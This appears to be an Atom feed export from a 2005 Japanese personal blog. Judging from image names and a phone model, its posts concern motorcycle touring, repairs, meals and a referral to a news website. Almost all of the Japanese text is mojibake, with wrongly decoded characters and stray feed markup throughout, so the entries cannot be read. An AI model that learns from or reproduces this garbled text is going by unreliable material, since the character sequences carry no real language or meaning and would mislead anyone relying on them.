    - -¥ֽ¥ֳ¥ָµ­¼װ - -2005-11-22T11:46:16Z -2005-08-16T09:59:26Z -tag:motors.sytes.net,2005:/nishio//1.347 -2005-08-16T09:59:26Z -ְטֶ₪¢₪כ‎₪ֻ¥³¥ב¥ף¥ָ₪עִ÷₪­₪₪·₪¿¡£ ₪´ֲ¸₪¸₪־₪ט₪¦₪ֻ¥ײ¥ם¥°₪ַ¾®¸¯₪₪²װ₪®₪ֻamazo... - -mannen - -ma240nishio@docomo.ne.jp - -»¨µ­ - -ְטֶ₪¢₪כ‎₪ֻ¥³¥ב¥ף¥ָ₪עִ÷₪­₪₪·₪¿¡£

    -

    ₪´ֲ¸₪¸₪־₪ט₪¦₪ֻ¥ײ¥ם¥°₪ַ¾®¸¯₪₪²װ₪®₪ֻamazon¥¢¥½¥·¥¨¥₪¥ָ₪ה¥¢¥ױ¥ך¥¨¥₪¥ָ₪ע₪·₪ֶ₪₪₪י₪ֳ₪·₪ד₪כ‎₪ֲֿ¿₪₪₪ָ»׳₪¦₪־₪ַ₪¹₪¬¡¢₪½₪ל₪י₪ֿ¼«¥µ¥₪¥ָ₪־¥ך¥ף¥¯₪ט₪ך¾¦ֹ₪ע¹״ֶ‏ִ÷₪₪₪ֶ¡¢₪½₪־ַה₪ך¾ו₪²₪־²¿¥ׁ¡¼¥»¥ף¥ָ₪«₪־ֽר±׳₪עְֶ₪כ₪ָ₪₪₪¦₪ג₪־₪ַ₪¹¡£

    -

    ¡₪ֱ₪₪₪ֻ¡¢»ה₪־¾ל¹חַה₪ך¾ו₪²₪ֿ₪₪ְ£³£°£°£°±₪ַ₪¹¡£¡ֻ*1

    -

    °²¼₪½₪־¥³¥ב¥ף¥ָ₪ע°תֽׁ₪µ₪»₪ִֶ÷₪­₪₪¹¡£

    -
    -

    ₪×₪ֳ₪ֱ₪ד₪ף¥י¥₪¥ְ¡¼₪־₪ִ₪ײ₪הµ­ֽֽ

    -

    ֱֶֽ³₪־₪´ֿ¢ֽם₪ַ¼÷־י₪₪₪¿₪·₪₪¹¡£¥ִ¥«¥µ¥ֽ¥ֳ¥ָ¿·¹₪־¡¡₪ָ¿½₪·₪₪¹¡£

    -

    ₪³₪ֱ₪י₪־¥ײ¥ם¥°₪עַׂ¸«₪·¡¢ְט·מ20ֶ₪ֻ¥׳¥ל¥×¡¼¥׳¥ף₪·₪₪·₪¿ְ¼ׂ±¿±ִ₪־¡״¥ִ¥«¥µ¥ֽ¥ֳ¥ָ¿·¹¡₪ֻµ­¼װֵ׀ֿ¿₪·₪ֶ₪₪₪¿₪ְ₪±₪₪₪₪«₪ָ»׳₪₪¡¢₪´ֿ¢ֽם₪µ₪»₪ֶ₪₪₪¿₪ְ₪­₪₪·₪¿¡£

    -

    ¾®»ז₪־¾÷₪ֿ¡¢http://www.222.co.jp/netnews/

    -

    ₪ע₪´ֽק²¼₪µ₪₪¡£

    -

    °לָּ₪־‎₪ֻ¡ײ¥ֽ¥ֳ¥ָµ­¼װ¡׳₪ָ₪₪ֳ₪ֶµ­»צ₪עֵך¹ֶ₪·₪ֶ₪₪₪¿₪ְ₪­¡¢₪½₪ל₪עװ½¸₪·₪ֶ¥ֽ¥ֳ¥ָ¿·¹₪ָ₪¹₪כ₪־₪¬¥³¥ף¥»¥׳¥ָ₪ַ₪¹¡£µ­»צ₪ֻ₪ֿװ½¸ֹפ₪ֳֳַֽ₪ע₪ִ₪±₪ֶ¡¢ַד₪₪¼ט₪י₪»₪ֶ₪₪₪¿₪ְ₪¯¥·¥¹¥ֶ¥א₪ַ₪¹¡£

    -

    ֲחׁ¼÷־י₪₪¬₪י¡¢¥ב¡¼¥כ¥¢¥ֹ¥ל¥¹₪¬¥¦¥§¥ײ¾ו₪«₪י³־ַ§₪¹₪כ₪³₪ָ₪¬₪ַ₪­₪₪«₪ֳ₪¿₪¿₪ב¡¢÷£²ף₪³₪־₪ט₪¦₪·ֱ₪ַ¥³¥ב¥ף¥ָֽף₪ֻµ­ֶ‏₪µ₪»₪ֶ₪₪₪¿₪ְ₪­₪₪·₪¿¡£

    -

    ₪´¶¨־ֿ₪₪₪¿₪ְ₪±₪ל₪׀¹¬₪₪₪ַ₪¹¡£₪´ֹװְּ₪ְֵ₪₪ֹ₪´₪¶₪₪₪₪·₪¿₪י

    -

    netnews@222.co.jp

    -

    ₪₪ַ₪×µ₪·₪ֻ₪×ּה₪₪¹ח₪ן₪»₪¯₪ְ₪µ₪₪¡£

    -

    ₪ט₪ם₪·₪¯₪×´ך₪₪₪₪₪¿₪·₪₪¹¡£

    -

    ¥ִ¥«¥µ¥ֽ¥ֳ¥ָ¿·¹װ½¸ֹפ¡¦¡¡

    -

    HP : http://www.222.co.jp/netnews/

    -
    -

    ₪½₪ם₪½₪םֶ¬₪¬¸ַ₪¯₪₪ך»ֿ₪ב₪¿¡ײ₪×₪ֳ₪ֱ₪ד₪ף¥י¥₪¥ְ¡¼¡׳₪ֻ₪ֿ¡¢₪₪ף₪־₪³₪ָ₪«ֽ‎²ע₪¹₪כ₪־₪ֻ₪«₪₪ך»‏´ײ₪¬₪«₪«₪ך₪₪·₪¿¡£

    -

    ¡״¼«¼ׂ¥µ¥₪¥ָ₪־ְכֱֵ₪־₪¿₪ב£±£°£°£°±₪«₪י£±ֻ±₪ַµ­»צ₪עַד₪₪¼ט₪ֳ₪ֶ₪¯₪ל₪כ¡₪ָ₪₪₪¦₪־₪ַ₪¹¡£

    -

    ₪³₪ל₪«₪י₪ֿ¥¢¥ױ¥ך¥¨¥₪¥ָ₪₪ֹ₪־₪ט₪¦₪ֻ¥ײ¥ם¥¬¡¼₪¿₪ֱ₪־´ײ₪ֻ¹­₪₪ֳ₪ֶ₪₪₪¯₪־₪ַ₪·₪ח₪¦¡£

    -

    ¥ֶ¥­¥¹¥ָ₪ֻ¼«¿®₪־₪₪₪¡ײ₪×₪ֳ₪ֱ₪ד₪ף¥י¥₪¥ְ¡¼¡׳₪ֿµ­¼װֵ׀ֿ¿₪ֻ¸ַֽֿ₪ֳ₪ֶ₪×₪ך₪₪¹₪¬¡¦¡¦¡¦(^^;)

    -
      -
    • *1: ¹״ֶ‏ִ÷₪­₪₪·₪¿‎,ֵֻצ₪ֻֽ­₪ךֶס₪¦¸ז÷ֲ₪₪₪₪·₪¿¡£ £ם¡¡²¡²¡ֻ£ם
    • -
    ]]> - -
    -
    - -ָפֲֽ¡¦¹ג»³¥ִ¡¼¥ך¥ף¥° - -2005-11-22T11:46:11Z -2005-08-15T03:15:44Z -tag:motors.sytes.net,2005:/nishio//1.346 -2005-08-15T03:15:44Z -¡¥°¥כ¥ב¡ ¡ת ₪₪₪¯₪ִ₪ג₪־ֶ½₪ע±₪¨°¦ֳ־¸©₪ֳֻו₪¯÷¢₪ֻ₪ֿ₪×ֳכ₪ֹ₪­¡¢₪₪₪­₪₪ךּװ־ץ₪ַ®... - -mannen - -ma240nishio@docomo.ne.jp - -¥ִ¡¼¥ך¥ף¥° - -¡¥°¥כ¥ב¡

    -

    ¡ת ₪₪₪¯₪ִ₪ג₪־ֶ½₪ע±₪¨°¦ֳ־¸©₪ֳֻו₪¯÷¢₪ֻ₪ֿ₪×ֳכ₪ֹ₪­¡¢₪₪₪­₪₪ךּװ־ץ₪ַ®ֹק₪ֻ½±₪ן₪ל₪כ¡£

    -

    ¿ב₪­½׀₪¿´ְ₪ֿ½ײ»‏₪ֻ´¥₪₪₪ֶ₪·₪₪¦¡£₪¢₪₪ך₪־½כ₪µ₪ֻ¿©ֽ₪ג₪₪₪¡£₪³₪ף₪»‏₪ֿ¡ײ¥¿¥₪־ֱֽ‎¡׳₪ֻ¸ֲ₪כ¡£±¿־ֹ₪¯¹גֲ®₪ע²¼₪ך₪כ₪ָ¡ײ¥¿¥₪־ֱֽ‎ְלּחֵ¹¡׳₪עָ¯¸«₪·₪¿¡£µ₪₪₪ט₪ל₪י₪ל₪כ₪ט₪¦₪ֻ³§ָפ₪׃¹‏₪ף₪ַ₪₪₪ֳ₪¿¡£ֵ¹ֶג₪ֿ₪₪µ₪ֻ¡ײ¥¿¥₪¡׳₪ע»׳₪ן₪»₪כ·°ֿµ₪₪ְ¡£*1¡ײ¥¿¥₪־ֱֽ‎¡׳₪ָ¸ְ₪¨₪׀¡ײ¥ָ¥א¡¦¥ה¥ף¥¯¥ף¡׳¡£

    -

    ₪¦¡ֱ₪ף¿ֹ₪₪¡£₪ה₪ֳ₪ׁ₪ך½כ₪₪₪ָ₪­₪ֿ¡¢¥¹¥ׁ¥₪¥¹₪־¸ת₪₪₪¿־ֱֽ‎₪ֻ¸ֲ₪כ¡£

    -

    tom.JPG

    -

    ¡ת £²ֶּ₪־₪×ֳכ₪ַֿעְמ¶¿₪־¹ח¾¸ֲ₪₪ך₪־¿©ֶ²₪ַ¡ײ¥₪¥ן¥ִך¿©¡׳¿©₪₪כ₪³₪ָ₪ֻ₪·₪¿¡£

    -

    ¥₪¥ן¥₪־ֳ¸ַס₪ּ£₪ן₪₪₪ְֻו¸₪עֲַ₪ִ¡£

    -

    iwana.JPG

    -


    -

    ¡¥ָ¥י¥ײ¥כ¡

    -

    ₪ה₪ֿ₪ךֽ½ֱ₪ג₪·₪₪₪₪ָ₪³₪ם₪¬²ץ₪ל₪ֶ₪·₪₪ֳ₪¿¡£

    -

    ¡ת °לֶּ₪־ֳכ¿©¸ו¡¢ֱ°ֶ¥ך¥¢₪־¥ַ¥£¥¹¥¯¥ׁ¥ֳ¥ָ₪ע¸ע´¹₪·₪¿¡ײ¥¢¡¼¥ך¡¼¥·¥ח¥¥כ¾ט₪ך¡׳₪¬¶«₪ף₪ְ!

    -

    ¡ײ¥ך¥ה¥ײ¥ל¡¼¥­₪¬¸ת₪­₪ֳ₪ׁ₪₪·₪ֻ₪₪ֳ₪ֶ₪·₪₪ֳ₪ֶ₪₪₪כ!¡׳

    -

    °ל½ײ¡¢»ה₪ְִֿ₪¶₪ב₪¿¡£ֱ°ֶ¹װ₪ֳ₪¿÷מ¶ָ₪ֻ¥¥¹₪¬₪¢₪ֳ₪¿₪־₪«¡©

    -

    ִ´₪₪ֶ₪₪כ₪ָ¥ך¥ה₪־¥ײ¥ל¡¼¥­¥¥ְ¥כ₪¬¥¬¥¿¥¬¥¿₪·₪ֶ₪₪₪כ¡£

    -

    ¡ײ¥¥¹¥¿¡¼¥·¥ך¥ף¥ְ¡׳₪־¥װ¥¹¥ָ¥ף₪¬ֶ°₪«₪₪¯₪₪ֳ₪ֶ₪·₪₪ֳ₪ֶ₪₪₪כ₪־₪ְ¡£¡¥¥¹₪ַּµ₪«₪ֳ₪¿₪־₪ַ₪ָ₪ך₪¢₪¨₪÷»ה₪ֿ¶»₪ע₪₪ַ²¼₪ם₪·₪¿¡£¡ֻ

    -

    ֱב¡¹¡¢¥¥¹¥¿¡¼¥·¥ך¥ף¥ְ¡¼₪ע¬²ע₪·₪ֶ₪₪כ¡£

    -

    ¸ֳַו₪·₪¿¥װ¥¹¥ָ¥ף₪ע²¿₪ָ₪«¼ט₪ך½׀₪·¡¢ִ´₪₪¿₪ָ₪³₪ם¡¢¡ײ¥׳¥י¥¹¥ֱ¥ֳ¥¯ְ½₪־¥װ¥¹¥ָ¥ף¡׳₪¬ִִֻ¥₪·₪ֶ₪₪₪¿¡£¥ֿ¡¼¥ל¡¼½דְµ₪־¥·¥ך¥³¥ף¥¿¥₪¥׳₪־¥ײ¥ל¡¼¥­¥×¥₪¥כ₪ע»ָ₪ֳ₪ֶ₪₪₪₪ָ₪³₪־₪ט₪¦₪¥ָ¥י¥ײ¥כ₪¬µ¯₪³₪כ₪¬¡¢÷ַ¶ב¸ע´¹₪·₪ֶ₪₪₪₪ג₪־₪־¡¢½דְµ₪ע»ָ₪ֳ₪ֶ₪₪₪כ¡£¸¶°ר₪ֳִֶֿך₪ַ₪­₪₪₪₪¬₪ָ₪ך₪¢₪¨₪÷¥װ¥¹¥ָ¥ף₪ע¥µ¥ף¥ֹ¥¡¼¥ׁ¡¼₪ַֻב₪₪₪ֲֶ׀½ט₪·₪¿¡£₪₪¿ֽ½ָק₪־¥ײ¥ל¡¼¥­¥×¥₪¥כ₪ע»‎₪ֳ₪ֶ₪₪₪₪«₪ֳ₪¿₪־₪ַ¡¢¥ײ¥ל¡¼¥­₪־¥¨¥¢ָ´₪­₪ֻ₪ֿ¶לֿ«₪·₪ֶ₪·₪₪ֳ₪¿¡£

    -

    master.JPG
    ¥װ¥ף¥¥±₪ַ₪·₪¿¡£

    -

    £ם¡¡²¡²¡ֻ£ם

    -

    ¡ת ֶ₪¬·¹₪₪₪ֶ÷ַ¸ו₪־µ·ֶ₪ע₪ָ₪ֳ₪ֶ½׀ָ¯₪¹₪כ₪ָ₪­₪ְ₪ֳ₪¿¡£

    -

    ¡ײ¥¢¥¯¥»¥כ¥ן¥₪¥ה¡¼₪¬ְ₪ל₪ֶ₪·₪₪ֳ₪¿!¡׳ֳח´ײ₪־°ל¿ֽ₪¬¶«₪ף₪ְ!

    -

    ₪ג₪ֱ₪ם₪ףֽ½ָק₪־¥ן¥₪¥ה¡¼₪ֿ»‎₪ֳ₪ֶ₪₪₪₪₪¡£

    -

    ¹¬₪₪¥¢¥¯¥»¥כ¥°¥ך¥ֳ¥׳₪־¶ב₪¯₪ְַ₪ל₪ֶ₪₪₪¿₪־₪ַ¡¢¥ן¥₪¥ה¡¼₪ע·כ₪ף₪ַ±‏µ₪ֻ½טֽ‎₪¹₪כ»צ₪¬₪ַ₪­₪¿¡£

    -

    ¡ת ₪ה₪ֳ₪ָ¥¥ֶ¥כ₪־ֳף¼ײ¾ל₪ֳֻו₪₪₪¿₪ָ₪­÷£ֵ₪ּֿ₪־ֳח´ײ₪¬¶«₪ף₪ְ¡×

    -

    ¡ײ¥ך¥ה¥ײ¥ל¡¼¥­₪־¥¥¹¥¿¡¼¥·¥ך¥ף¥ְ₪־¥ױ¥¿₪¬ּµ₪¯₪₪ֳ₪ֶ₪·₪₪ֳ₪ֶ₪₪₪כ!¡׳

    -

    ¡°²¼¼ּ¿¿ְײּנ°ץ¡ֻ

    -

    ₪ג₪ֱ₪ם₪ףֽ½ָק₪¬₪¢₪כ₪ֿ₪÷₪ג₪₪¯¡¢¥׃¥ֻ¡¼¥כ¥ֶ¡¼¥׳₪ַ²¿₪ָ₪«ֲ׀½ט₪ַ₪­₪¿¡£

    -

    huta.JPG
    ₪³₪־¥·¥ח¥¥כ₪ֿ÷£²ף¡¢½י»²²ֳ₪־¿·¼ײ¡¥ל¥¹¥ָ¥¢¡ץ¥«¥¹¥¿¥א¡ֻ₪ַ₪·₪¿¡£

    -

    ¡ת ֲ¾₪ֻ₪ֿ¡¢¥¥ױ¥י¡¼₪־¥µ¥₪¥ל¥ף¥µ¡¼₪־¥¹¥ֶ₪¬ְ₪ל₪¿₪ך¥¬¥½¥ך¥ף¥­¥ד¥ֳ¥׳₪¬ִ₪₪י₪₪₪₪₪ֹ₪־¥ָ¥י¥ײ¥כ¡₪₪₪÷₪ל₪ג¥«¥¹¥¿¥א¥ׁ¡¼¥ִ¡ֻ₪¬₪¢₪ֳ₪¿₪¬¡¢±‏µ₪ֲַ׀±‏₪ַ₪­₪¿¡£

    -

    »ה₪־£¸£¸£³₪ְֿה¹¥ִ´₪ַ¡¢¥ִ¡¼¥ך¥ף¥°ֱ°₪ֻ¸ע´¹₪·₪¿¥×¥₪¥כ₪ה¥ך¥ה¥·¥ח¥ֳ¥¯₪־ְ­ַ½₪ֻֿ‏ֲ­₪ַ₪­₪כ₪ג₪־₪ַ₪¢₪ֳ₪¿¡£

    -

    ֳֶ₪ֻ¥ך¥ה¥·¥ח¥ֳ¥¯₪ֿ¿·ֹ₪ְ₪ֳ₪¿₪־₪ַ¡¢÷ַ½י₪ֶֿ°₪­₪¬¾¯₪·½ֲ₪«₪ֳ₪¿₪¬ֱצ¹װ₪¹₪כ₪ֻ₪ִ₪ל¡¢ָף¾ן₪ֻ₪·₪₪ה₪«₪ֻ₪₪ך¡¢¾ט₪ך¿´ֳֿ₪ה¥³¡¼¥¡¼₪ַ₪־ְ­ַ½₪ֱֻ´₪¯ֹװֻ‏₪ּֿµ₪«₪ֳ₪¿¡£

    -

    ¡´ׁ¸ק¡

    -

    sirakawa.JPG

    (²טּּ₪ע¥¯¥ך¥ֳ¥¯₪¹₪כ₪ָ¸µ₪־¥µ¥₪¥÷₪ֻ₪₪ך₪₪¹¡ֻ

    -

    ÷£²ף₪ֿ¹ח¾¸ֲ₪₪ך₪ַֽ­ּ¾₪¡ײַעְמ¶¿¡׳₪ֻ¹װ₪¯₪³₪ָ₪ֻ₪₪ך₪₪·₪¿¡£¹גֲז₪«₪יִ¯₪ב₪כֹק·₪ֿ÷ַ¹ג₪ַ₪·₪¿¡£(^_^)v

    -
      -
    • *1: ¹װ₪ֳ₪¿₪³₪ָ₪ֿ₪¢₪ך₪₪»₪ף₪¬¡¦¡¦¡¦¡¾׀₪₪¡ֻ
    • -
    ]]> - -
    -
    - -ַעְמ¶¿ - -2005-11-22T11:46:10Z -2005-08-14T02:45:14Z -tag:motors.sytes.net,2005:/nishio//1.345 -2005-08-14T02:45:14Z - ¹ח¾¸ֲ₪₪ך₪ֻ¹ח¾¸ from SO506iC... - -mannen - -ma240nishio@docomo.ne.jp - -moblog - - -

    blog-photo
    ¹ח¾¸ֲ₪₪ך₪ֻ¹ח¾¸

    -

    -

    from SO506iC

    ]]> - -
    -
    - -¹ג»³₪־ּכ - -2005-11-22T11:46:08Z -2005-08-13T12:50:47Z -tag:motors.sytes.net,2005:/nishio//1.344 -2005-08-13T12:50:47Z - ּף2»‏´ײֳ₪ל₪ַ½ֹ₪ֻ₪ִ₪₪₪¿¡£ ₪ה₪ֿ₪ך¥ָ¥י¥ײ¥כ₪¬½׀₪ֶ₪·₪₪ֳ₪¿¡£¾₪·₪¯₪ֿµ¢₪ֳ₪ֶ₪«... - -mannen - -ma240nishio@docomo.ne.jp - -moblog - - -

    blog-photo
    ּף2»‏´ײֳ₪ל₪ַ½ֹ₪ֻ₪ִ₪₪₪¿¡£ -

    -

    ₪ה₪ֿ₪ך¥ָ¥י¥ײ¥כ₪¬½׀₪ֶ₪·₪₪ֳ₪¿¡£¾₪·₪¯₪ֿµ¢₪ֳ₪ֶ₪«₪יף¹נ₪¹₪כ₪³₪ָ₪ֻ₪·₪ח₪¦¡£

    -

    ּµ»צµ¢₪ל₪כ₪ְ₪ם₪¦₪«¡©

    -

    ₪₪ֻ₪ֿ₪ָ₪ג₪¢₪ל¹ג»³₪־ּכ₪ֿ־ֳ₪·₪¯÷ַ¹ג₪ַ₪¹¡£

    -

    from SO506iC

    ]]> - -
    -
    - -¥¢¡¼¥ך¡¼¥·¥ח¥¥כ - -2005-11-22T11:46:05Z -2005-08-12T08:20:35Z -tag:motors.sytes.net,2005:/nishio//1.343 -2005-08-12T08:20:35Z - ¹±־ד₪־₪×ֻ¥ִ¡¼¥ך¥ף¥°₪ְֶּֿ₪«₪י₪ְ₪¬¡¢¥ב¥«¥ֻ¥ֳ¥¯ֳ´ֵצ₪־»ה₪־¥ִ¡¼¥ך¥ף¥°₪ֿ₪¹₪ַ₪ֻ»ֿ₪... - -mannen - -ma240nishio@docomo.ne.jp - -¥ֿ¡¼¥ל¡¼ - -
    syobel_1.jpg

    -

    syobel_2.jpg

    -

    ¹±־ד₪־₪×ֻ¥ִ¡¼¥ך¥ף¥°₪ְֶּֿ₪«₪י₪ְ₪¬¡¢¥ב¥«¥ֻ¥ֳ¥¯ֳ´ֵצ₪־»ה₪־¥ִ¡¼¥ך¥ף¥°₪ֿ₪¹₪ַ₪ֻ»ֿ₪₪ֳ₪ֶ₪₪₪כ¡£°ל½ן₪ֻ¹װ₪¯¥¢¡¼¥ך¡¼¥·¥ח¥¥כ¾ט₪ך₪־ֳח´ײ₪«₪יְֵ¸¡₪עֽך₪₪ל₪ֶ₪·₪₪ֳ₪¿₪«₪י₪ְ¡£

    -

    ¸־¾דֽת־ע₪־₪¢₪כ²ױ½ך₪ע÷ְֵֵֶ¸¡₪·₪ֶ₪₪כ¡£

    -
      -
    • su¥­¥ד¥ײ¥װ¥¹¥ָ¥ף¥·¥ד¥ױ¥ָ¡ְµ¼°ּ¾ֹװְּ¡ֻ¥×¥₪¥כְ₪לְֵ¸¡
    • -
    • ¥·¡¼¥ָ²¼ְַ‏ְֵ¸¡
    • -
    • ¥¥₪¥ף¥ְֵָ¸¡
    • -
    • ¥¥ֳ¥·¥ח¥ף¥×¥₪¥כֿ³₪ל
    • -
    • ¥¨¥ף¥¸¥ף¼‏₪ך¥¥כ¥ָ₪־₪ז₪כ₪
    • -
    -

    ₪³₪³£²ַ¯₪₪ֹ¡¢₪¢₪₪ך¾ט₪ֳ₪ֶ₪₪₪₪₪₪־₪ֳֶַ₪ֹֻװ¶ס¹ח₪ֿ¸«₪¢₪¿₪י₪₪«₪ֳ₪¿¡£

    -

    pad.jpg
    ₪¬¡¢¥ך¥ה₪־¥ײ¥ל¡¼¥­¥ׁ¥ֳ¥ֹ₪ע¸«₪כ₪ָ₪¹₪ַ₪ֻ₪¹₪ך¸÷₪ֳ₪ֶ₪·₪₪ֳ₪ֶ₪₪₪כ₪ַ₪ֿ₪₪₪₪«¡¦¡¦¡¦¡¦¡¦

    -

    ₪ג₪¦÷£₪«₪י₪ַ₪ֹֿפֹ₪¬´ײ₪ֻ¹ח₪₪₪½₪¦₪ֻ₪₪₪¡£

    -

    ֱב₪¯₪גֳ¦ֽמ¼װ₪¬½׀₪ֶ₪·₪₪¦₪־₪«¡©

    -

    ֲ¾₪־ֳח´ײ₪ֻּה₪₪¹ח₪ן₪»₪¿₪ָ₪³₪ם¡¢¹¬₪₪₪ֻ₪גֽ½ָק₪־¥ׁ¥ֳ¥ֹ₪ע»‎₪ֳ₪ֶ₪₪₪כ₪ָ₪־₪³₪ָ¡£¡£¡£

    -

    ₪·₪«₪·°ֲ¿´₪ֿ₪·₪ֶ₪₪₪י₪ל₪₪₪ְֶּ₪«₪י₪₪₪ט₪₪₪ט¥ִ¡¼¥ך¥ף¥°₪¬₪ֿ₪¸₪₪כ₪־₪ְ¡£

    -

    ֱב₪¯₪גֱ´¿ָ₪ע¥¢¥ֹ¥ל¥¥ך¥ף₪¬¶מ₪±₪ב₪°₪ך»ֿ₪ב₪¿¡£

    -

    ₪ֳ₪ֶ¡¢₪«₪₪ך₪×₪×₪²₪µ₪ַ₪¹₪¬¡¦¡¦¡¦¡¾׀₪₪¡ֻ

    ]]> - -
    -
    - -ָפֲֽ¡¦¹ג»³¥ִ¡¼¥ך¥ף¥° - -2005-11-22T11:46:04Z -2005-08-11T10:28:21Z -tag:motors.sytes.net,2005:/nishio//1.342 -2005-08-11T10:28:21Z -₪₪₪ט₪₪₪ט₪×ֻ¥ִ¡¼¥ך¥ף¥°₪¬¶ב₪ֵ₪₪₪ֶ₪­₪₪·₪¿¡£°¦¼ײ₪־£¸£¸£³₪־¥ב¥ף¥ֶ¥¥ף¥¹₪ֿ¥׀¥ֳ¥ֱ¥ך₪ַ... - -mannen - -ma240nishio@docomo.ne.jp - -¥ִ¡¼¥ך¥ף¥° - -₪₪₪ט₪₪₪ט₪×ֻ¥ִ¡¼¥ך¥ף¥°₪¬¶ב₪ֵ₪₪₪ֶ₪­₪₪·₪¿¡£°¦¼ײ₪־£¸£¸£³₪־¥ב¥ף¥ֶ¥¥ף¥¹₪ֿ¥׀¥ֳ¥ֱ¥ך₪ַ₪¹¡£

    -

    ÷£ֶ₪ֿ¡¢²ֻ₪ע₪₪ֶֻ°ל₪־¥ָ¥י¥ײ¥כ₪־₪¿₪ב»‎₪ֳ₪ֶ₪₪₪¯ֶ»¶ס₪־½אָק₪ע₪·₪ֶ₪₪₪·₪¿¡£

    -

    kougu.jpg

    -

    »ה₪¬»‎₪ֳ₪ֶ₪₪₪¯₪־₪ֿ¡¢ֵֵµ₪·ֿ₪עִ´₪₪כ¥ֶ¥¹¥¿¡¼¡¢₪½₪ל₪ֻ¥ׁ¥ף¥¯₪ָֻק₪¨₪ֶ₪־¹©¶ס°ל¼°₪ַ₪¹¡£¡¥¿¥₪¥ה₪ע¼ט₪ך³°₪¹₪³₪ָ₪ג¹ֽ₪¨₪ֶ¡¢¥¸¥ד¥ֳ¥­₪ג»‎₪ֳ₪ֶ₪₪₪­₪₪¹¡£¡ֻ

    -

    ±ךֵ·²¼₪־ֳז¡¢ֿ©¸×₪ַ¥ׁ¥ף¥¯½₪ֽ‎₪ָ₪₪₪¦₪־₪ֿ·כ¹½»‏´ײ₪¬₪«₪«₪כ₪·ֲחׁ₪ַ₪¹¡£

    -

    ¹¬₪₪¥ׁ¥ף¥¯₪־·׀¸³₪ֿ°ל²ף₪ְ₪±₪ַ₪¹¡£¡¥ֱ¥ו¡¼¥ײ¥¿¥₪¥׳₪ְ₪ֳ₪¿₪־₪ַ£±»‏´ײ₪־¥ם¥¹₪ָ₪₪ך₪₪·₪¿¡£¡ֻ

    -

    ֲח₪­₪·ך₪ַ₪₪±₪ל₪׀¡¢¥ׁ¥ף¥¯½₪ֽ‎÷₪ֲַ׀±‏₪·₪¿‎₪¬פ£₪«₪ֻ³₪ַ₪¹¡£

    -

    ₪₪¿£¸£¸¡ְַ½₪ָ₪ג₪¦£±£·ַ¯ֱ°₪־£¸£¸£³₪ע¾ט₪כ»ה₪ָ₪·₪ֶ₪ְֿ§ָף₪ָ₪גֽ½ָק₪־¡ײְֵ²׀·ֿ¥ג¥¸¥ו¡¼¥כ¡׳₪ע»‎₪ֳ₪ֶ₪₪₪­₪¿₪₪₪־₪ַ₪¹₪¬¡¢₪₪«₪₪«¼ך÷¢₪ֳז¸ֵֹ₪ע¥²¥ֳ¥ָ₪¹₪כ»צ₪¬₪ַ₪­₪₪»₪ף¡£

    -

    ÷£ַ¯₪־¥ִ¡¼¥ך¥ף¥°₪ֿ»²²ֳ¼װ£¶¿ֽ₪ַ¡¢₪½₪־₪¦₪ֱ¥·¥ח¥¥כ£³ֲז¡¢¥¨¥₪־¥׃¥ֳ¥¯¥ִ¥₪¥ף₪¬£²ֲז¡¢₪½₪·₪ֶ»ה₪־£¸£¸£³₪ַ₪¹¡£

    -

    ³§₪½₪ל₪¾₪ל¡»ה₪־£¸£¸£³₪ע½₪¯¡ֻ₪«₪₪ך¥«¥¹¥¿¥¥₪¥÷₪µ₪ל₪ֶ₪×₪ך₪₪¹¡£

    -

    ₪ֿ₪ֳ₪­₪ך¸ְ₪ֳ₪ֶ°ל½ן₪ֱֻצ₪כ₪ָ»ה₪־£¸£¸£³₪ֿ₪«₪₪ך±ֶ₪¬ַצ₪¯₪₪ֳ₪ֶ₪·₪₪₪₪₪¹₪¬¡¢¾ט₪ךּ£₪־‎₪ַ₪ֿ·ט₪·₪ֶ£¸£¸£³₪ַ₪ג₪ׂ₪±₪ע¼ט₪כ₪³₪ָ₪ֿ₪₪₪₪־₪ַ¡¢»ה₪ֿ½½¬ֻ‏ֲ­₪·₪ֶ₪₪¹¡£

    -

    ּהֲך₪־ֵ·¸ץ₪ַ₪¹₪¬¡¢₪₪₪ִ₪ג₪־₪³₪ָ₪ַ₪¹₪¬¡¢₪ה₪ֿ₪ך¡ײ±«ֳֻ¡׳₪¬₪₪₪כ₪־₪ַ¡»ה¡©¡ֻ₪ֹ₪¦₪ג¡¢ְ²ֵ·₪ָ₪ֿ₪₪₪­₪₪»₪ף¡£¡¥י¥₪¥ְ¡¼₪ֻ₪ֿ¿¿²ֶ₪ָ₪ֿ₪₪₪¨±«₪¬¹₪כ₪ָ־ֳ₪·₪₪₪־₪עִּ₪ך±₪·₪ֶ´¨₪₪¡£¡ֻ

    -

    ₪₪¡¡¢½אָקֳֻ¼₪ַ₪¹₪·¡¢₪¢₪ָ₪ּֿµ»צ¸־¡¢ּµ°דָ¿¡¢¥־¡¼¥ָ¥י¥ײ¥כ₪עµ§₪כ₪־₪₪ַ₪¹¡£¡°¡°

    ]]> - -
    -
    - -¥·¥ח¥¥כ¡¡¥¥ֳ¥·¥ח¥ף¡¡¥×¥₪¥כֿ³₪ל - -2005-11-22T11:46:04Z -2005-08-10T10:08:47Z -tag:motors.sytes.net,2005:/nishio//1.341 -2005-08-10T10:08:47Z -÷£ֶ₪ֿ¹¹₪ֻ¥¥₪¥¡¼₪¥ֽ¥¿₪ֻ₪₪ֳ₪ֶ₪·₪₪₪₪₪¹¡£(^-^; ¡״¥ך¥¸¥ֳ¥ָ¥ױ¥ל¡¼¥א₪ֻ¥·¥ח... - -mannen - -ma240nishio@docomo.ne.jp - -¥ָ¥י¥ײ¥כ - -÷£ֶ₪ֿ¹¹₪ֻ¥¥₪¥¡¼₪¥ֽ¥¿₪ֻ₪₪ֳ₪ֶ₪·₪₪₪₪₪¹¡£(^-^;

    -

